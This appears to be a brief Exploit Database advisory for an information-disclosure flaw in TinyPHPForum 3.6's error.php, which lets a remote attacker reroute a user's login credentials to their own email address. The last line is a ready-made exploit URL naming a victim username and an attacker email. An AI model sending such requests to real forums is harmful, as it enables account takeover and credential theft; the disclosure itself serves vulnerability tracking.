TinyPHPForum 3.6 - 'error.php' Information Disclosure

EDB-ID:

28322

CVE:

N/A




Platform:

PHP

Date:

2006-08-01


source: https://www.securityfocus.com/bid/19278/info

TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker. 

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

http://www.example.com/error.php?err=200&uname=victim&email=attacker@example.com